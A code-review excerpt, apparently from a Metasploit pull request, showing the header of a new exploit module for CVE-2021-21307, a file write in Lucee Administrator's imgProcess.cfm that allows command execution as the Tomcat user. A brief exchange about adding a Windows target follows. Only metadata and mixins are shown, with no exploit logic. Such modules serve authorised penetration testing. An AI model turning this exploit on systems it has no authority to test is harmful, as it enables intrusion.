modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb

```diff
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Lucee Administrator imgProcess.cfm Arbitrary File Write',
+        'Description' => %q{
+          This module exploits an arbitrary file write in Lucee Administrator's
+          imgProcess.cfm file to execute commands as the Tomcat user.
+        },
+        'Author' => [
+          'rootxharsh', # Discovery and PoC
+          'iamnoooob', # Discovery and PoC
+          'wvu' # Exploit
+        ],
+        'References' => [
+          ['CVE', '2021-21307'],
+          ['URL', 'https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643'],
+          ['URL', 'https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r'],
+          ['URL', 'https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md']
+        ],
+        'DisclosureDate' => '2021-01-15', # rootxharsh and iamnoooob's writeup
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
```

Comment:
Are you planning on adding a Windows target still?

Reply:
It's unlikely to happen, at least in this PR. :(